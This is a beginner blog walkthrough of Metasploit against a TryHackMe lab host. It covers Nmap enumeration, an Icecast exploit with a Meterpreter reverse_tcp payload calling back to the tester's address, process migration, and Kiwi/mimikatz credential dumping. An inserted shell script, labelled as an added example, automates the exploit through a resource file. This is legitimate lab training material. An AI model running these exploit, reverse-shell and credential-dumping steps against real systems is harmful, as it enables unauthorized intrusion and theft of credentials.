METASPLOIT For Beginners

Hello, Friend! Metasploit has been the holy grail of security tools for some years now. It can be used by almost anyone, whether you’re a script kiddie or an expert. That’s why I will be going through a walkthrough today to show you the full exploitation process on Metasploit. This walkthrough is heavily influenced by the Metasploit room on TryHackMe, I highly recommend you check out the free room after this article. 

This article assumes that you have used a Linux terminal before, but I will walk you through every part of the process. The first step is to start the PostgreSQL server that backs the Metasploit database. In the terminal, run service postgresql start (note the order: the service name comes before the action, and on most distributions this needs sudo). While it is possible to use Metasploit without PostgreSQL, some features, such as db_nmap and the stored hosts, services and credentials, will not be available without it.


Once PostgreSQL is running, we can start using Metasploit. Sidenote: if you are using a version older than Metasploit 5, you also have to run msfdb init to initialize the Metasploit database; Metasploit 5 and above take care of this automatically. Either way, once you are inside msfconsole you can confirm that the database is connected with the db_status command. As of July 5, 2021, the latest version of Metasploit is 6.0.47.


And now to the fun parts! It’s time to start up Metasploit. We start Metasploit by typing in the simple command on our terminal, msfconsole.    


Once you’re in Metasploit, the one piece of advice I’d give, which is coincidentally also one word, is EXPLORE! There are so many uses for Metasploit that you can become proficient in it just by exploring what’s inside it. We can get most of the syntax of Metasploit simply by using the help command (help followed by a command name shows the options for that command). For example, I love that there is a db_nmap command: it runs Nmap from inside Metasploit and saves the results in the database, so the hosts and services it finds can be listed later with the hosts and services commands. This presents the opportunity to use two powerful tools together. Now back to the point, we can go ahead with our walkthrough and start exploiting a machine.

For my example, I will be using a TryHackMe machine to take you through the process. The first thing we need to know when using Metasploit is modules. A module is a piece of software that performs a specific action, such as scanning or exploiting. Metasploit organizes its modules into six main types: Exploit, Payload, Encoder, No OPeration (NOP), Post, and Auxiliary (newer versions add an Evasion type as well). A module is selected with the use command; the similarly named load command is for plugins and extensions, not modules. If you want to read more about modules, I suggest the Metasploit documentation.

Back to our objective, we can now start exploiting our machine. The TryHackMe machine I am using for this demonstration has the IP 10.10.7.158.

The first step is to enumerate the machine. We can do this with db_nmap, which accepts the same flags as Nmap (a service-version scan is a good start) and records what it finds in the database.


Here we can see that Microsoft Windows RPC is open on port 135, among other services. Keep in mind, though, that the exploit we use below targets the HTTP service of the Icecast streaming server, not RPC, so confirm that Icecast shows up in your scan before going further. Next we set up the listener that will catch the connection from our payload: multi/handler. This is not a payload itself; exploit/multi/handler is a generic handler module that waits for whatever payload you configure on it. We can find it with the search multi/handler command. Once we have found it, we select it with the rather complicated command called use. See, hacking is easy! While we can type the module's full name, we can also use the number shown in the # column of the search results, for example use 5. That number is just the row in your own search output, so check it rather than copying mine.


On we go! We now set the payload (set PAYLOAD windows/meterpreter/reverse_tcp) and the address the target should connect back to, LHOST. In this case that is my TryHackMe VPN address, the one on the tun0 interface, because the target cannot reach my LAN or public IP. With that configured, we move on to the exploit itself, which is for Icecast. Metasploit 5 and later let us type use icecast: when the string matches exactly one module, use loads it and the prompt shows the module's full path.


Almost there! Now we just set the target IP (RHOSTS) and our own address again (LHOST) on the exploit. One more command and we’re in: type exploit -j or run -j. The -j flag runs the exploit as a background job, so the prompt stays free while the handler waits for the connection. Once it fires, we can check that we have exploited the machine with the sessions command, and we can interact with any session using sessions -i followed by the session number.
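The whole sequence above, from checking the database to listing sessions, can be replayed from a Metasploit resource script instead of being typed by hand. The following shell script is an added example and is not code from the article or from TryHackMe: it validates the two addresses first (a trailing space or a mistyped octet in LHOST is the most common reason the handler never gets a connection) and then writes an .rc file that sets every option explicitly, so nothing depends on values carried over from a previously used module. It assumes LHOST is your tun0 VPN address, RHOSTS is the lab target, and that exploit/windows/http/icecast_header is the module that use icecast resolves to; every address in it is a placeholder.

```shell
#!/bin/sh
# Added example, not code from the article or from TryHackMe: generate a
# Metasploit resource script (.rc) that replays the walkthrough's msfconsole
# steps in order, then run it with:  msfconsole -q -r icecast_lab.rc
# Assumptions (hypothetical values): LHOST is your VPN address (tun0), RHOSTS
# is the lab target, and exploit/windows/http/icecast_header is the module
# that 'use icecast' resolves to. This script itself contacts no host.

# Return 0 if $1 is a well-formed dotted-quad IPv4 address, 1 otherwise.
# Catches the usual copy-paste mistakes: stray space, missing octet, >255.
is_ipv4() {
  addr=$1
  case "$addr" in
    ''|*[!0-9.]*|.*|*.|*..*) return 1 ;;
  esac
  set -- $(printf '%s' "$addr" | tr '.' ' ')
  [ $# -eq 4 ] || return 1
  for octet in "$@"; do
    [ ${#octet} -le 3 ] && [ "$octet" -le 255 ] || return 1
  done
  return 0
}

# Write the resource script for one target to the file named in $3.
# Each option is set explicitly on the exploit module, and 'run -j' keeps
# the exploit in the background so 'sessions -l' can run afterwards.
make_rc() {
  lhost=$1
  rhosts=$2
  out=$3
  is_ipv4 "$lhost" || { echo "make_rc: bad LHOST '$lhost'" >&2; return 1; }
  is_ipv4 "$rhosts" || { echo "make_rc: bad RHOSTS '$rhosts'" >&2; return 1; }
  cat > "$out" <<EOF
# generated by make_rc for target $rhosts
db_status
db_nmap -sV $rhosts
services $rhosts
use exploit/windows/http/icecast_header
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST $lhost
set RHOSTS $rhosts
run -j
sleep 15
sessions -l
EOF
}

# Invoked directly with two addresses it writes icecast_lab.rc; with no
# arguments (for example when sourced) it only defines the functions above.
if [ $# -eq 2 ]; then
  make_rc "$1" "$2" icecast_lab.rc &&
    echo "wrote icecast_lab.rc; now run: msfconsole -q -r icecast_lab.rc"
fi
```

Save it as, say, make_rc.sh and run sh make_rc.sh <LHOST> <RHOSTS>, then msfconsole -q -r icecast_lab.rc from the same directory. The script only writes a file; nothing talks to the target until msfconsole executes the resource script, and the sleep before sessions -l gives the reverse connection a moment to arrive.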


We’re in! We can now explore the machine through the Meterpreter shell. As you can see, the first command I used is help, because it lists the commands available in this session. However, we can’t do much before escalating our privileges; getuid shows which user the session is currently running as. In this demonstration, we try to piggyback on the Print Spooler service, spoolsv.exe, which runs as NT AUTHORITY\SYSTEM. To find its process ID, we use the ps command. Once we have the PID, migrate followed by that PID moves Meterpreter into the process, and if it succeeds the session inherits that process's SYSTEM token. Migration only works when the current user has the right to open the target process, which a low-privileged user does not have for a SYSTEM process.


Since this doesn’t work, we can make use of mimikatz. We load it with the load kiwi command, which adds the Kiwi (mimikatz) extension to the session. Once it is loaded, the getprivs command enables every privilege the session's token already holds. Note that getprivs is a core Meterpreter command and does not turn you into a different user: Kiwi's credential commands, such as creds_all, need a SYSTEM or administrator session to read LSASS, so check getuid first and expect them to fail from a low-privileged session.


 Our work is done after this command! Have fun with your machine and remember, KEEP EXPLORING!  

Zablon Shewangizaw

June 19, 2021

HackHouse.net Author